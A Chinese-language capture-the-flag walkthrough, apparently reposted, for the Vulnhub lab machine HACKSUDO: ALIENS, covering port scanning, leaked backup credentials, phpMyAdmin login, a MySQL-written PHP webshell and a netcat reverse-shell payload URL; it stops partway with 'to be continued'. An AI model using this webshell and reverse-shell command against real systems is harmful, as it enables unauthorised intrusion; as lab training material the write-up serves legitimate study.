Vulnhub_HACKSUDO: ALIENS

Posted zhbkai

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_HACKSUDO: ALIENS相关的知识,希望对你有一定的参考价值。

Vulnhub下载地址https://www.vulnhub.com/entry/hacksudo-aliens,676/
0x01环境介绍

靶机ip:10.10.13.50

0x02信息收集

利用nmap进行端口漏洞的扫描,发现开放22、80、9000端口
既然有80端口,那下一步就是对80端口上的web页面进行扫描

利用dirmap扫描,发现一个页面

http://10.10.13.50/backup/


页面内容点击下载后,发现几个敏感数据

刚刚扫描出来的还有9000端口,访问了一下是phpmyadmin页面,将刚获得的敏感数据输入后,发现成功登陆

vishal/hacksudo

0x03漏洞检测

发现secure_file_priv为空值即可读可写

利用mysql写入一句话木马
image
0x04漏洞利用

payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash

将/bin/bash转发到10.10.13.253的8989端口上

未完,待续……

以上是关于Vulnhub_HACKSUDO: ALIENS的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub_HACKSUDO: PROXIMACENTAURI

Vulnhub_HACKSUDO: THOR

Vulnhub_HACKSUDO: THOR

Stammering Aliens

HDU4080Stammering Aliens(后缀数组+二分)

UVA10570 Meeting with Aliens数学计算